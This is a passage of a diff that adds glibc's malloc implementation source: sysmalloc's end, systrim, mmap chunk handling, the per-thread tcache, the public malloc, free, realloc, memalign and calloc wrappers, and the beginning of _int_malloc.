+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
